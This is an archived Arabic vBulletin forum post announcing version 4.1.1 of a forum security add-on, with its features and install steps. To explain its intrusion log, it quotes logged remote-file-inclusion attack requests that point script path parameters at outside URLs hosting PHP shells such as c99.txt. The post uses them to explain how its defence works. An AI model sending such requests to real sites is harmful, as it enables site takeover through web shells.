تذكرني !
تابعنا على
Bleach 25-26 منتديات العاشق
قسم الأرشيف والمواضيع المحذوفة قسم خاص بجميع المواضيع المحذوفة و المُكررة والتي لاتنطبق على الشروط والقوانين والتي لا شأن لها في أي قسم من أقسام المُنتدى

  #1  
قديم 09-30-2008, 10:11 AM
الصورة الرمزية العاشق 2005  
رقـم العضويــة: 365
تاريخ التسجيل: Sep 2008
المشـــاركـات: 94,808
نقـــاط الخبـرة: 85
افتراضي [Product] : هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى بأخر اصداراته من الفريق ال

السلام عليكم ورحمة الله وبركاته



اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني



عمل الهاك : حماية المنتدى بشكل كامل بعون الله





الخيار الاول : لتشغيل حمايه المنتدي

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

حجب عدة مواقع تساعد على العبث في المنتديات

تطوير للدوال القديمة للتوافق معه السيرفر

منع اكثر اوامر اليونكس وحيل الحقن في الشيل

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع


الان نأتي للقسم الاكثر اثارة للموضوع

عند دخولك مجلد sec

افتح الملف logfile_hacker.txt

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

رمز PHP:
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)


الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

طبعا الفاصلة تفصل بين كل معلومه ومعلومة

رمز PHP:
,


التاريخ والوقت

رمز PHP:
2007-12-11, 05:50:44,


عدد المحاولات

رمز PHP:
1197370244


ايبي الموقع المصااب

رمز PHP:
209.67.223.188


الاصابة طبعا تشفرت لاغراض امنيه

رمز PHP:
p=11575//codebb/lang_select


الاستغلال

رمز PHP:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?


نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه

رمز PHP:
libwww-perl/5.808


--------------

الان شرح التركيب

امسح جميع هاكات لها علاقه في الحمايه او منع xss

اما من ركب هاك الحمايه issw v4.0 issw v3

عليك فقط حذف ملف البرودكت

وتركيب المحدث

شرح حذف الهاك

من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

ومن ثم حذف توابعه

------------------------------------


التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي

واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

مع
تحيات الفريق الامني

الان من لوحت تحكم المنتدي قم برفع البرودكت


تم تجربت المنتج على الاصدار

3.6.x

3.7.0

3.7.3


لتتبع جديد الهاك على الرابط التالي

http://www.is-sw.net/index.php?issw=isswvb

الحمد لله على كل شيء

لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق

اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم

الــهــآك بــالــمــرفــقــآت

تم اصلاح مشكله الفوتر
تم ترقيه عدت دوال جديده مستخدمه للهكر لعرض config
تم عمل نظام التحديث والتنزيل من لوحت تحكم المنتدي
طرق الترقيه فقط ارفع ملف البرودكت مع السماح لخيار الكتابه في الاختيار نعم

وشكرا لكم


الملفات المرفقة i.s.s.wv4.1.1.zip (7.1 كيلوبايت)
 


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه للموضوع [Product] : هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى بأخر اصداراته من الفريق ال:
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
حصريا و بأخر اصدار مشغل الفلاش الشهير Flash Player 10.0.12.36 (IE) بأخر اصداراته... العاشق 2005 أرشيف قسم البرامج 0 12-14-2008 05:40 PM
حصريا البرنامج الذي سحق جوجل ايرث بأخر nasa world wind بأخر اصداراته كامل العاشق 2005 أرشيف قسم البرامج 0 12-04-2008 02:30 PM
[Product] : حصريا و انفراد الحمايه الكامله لمنتداك من اى اختراق مهما كان (الج العاشق 2005 قسم الأرشيف والمواضيع المحذوفة 0 11-28-2008 11:52 AM
[Product] : صندوق المحادثات Cyb Chatbox v2.3بدون تعديلات وميزات رائعة تعريب الدعم الع العاشق 2005 قسم الأرشيف والمواضيع المحذوفة 0 10-13-2008 05:01 PM

الساعة الآن 11:24 PM.


Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.

كُل ما يُكتب أو يُنشر في منتديات العاشق يُمثل وجهة نظر الكاتب والناشر فحسب، ولا يمثل وجهه نظر الإدارة

rel="nofollow" maxseven simplicity and clarity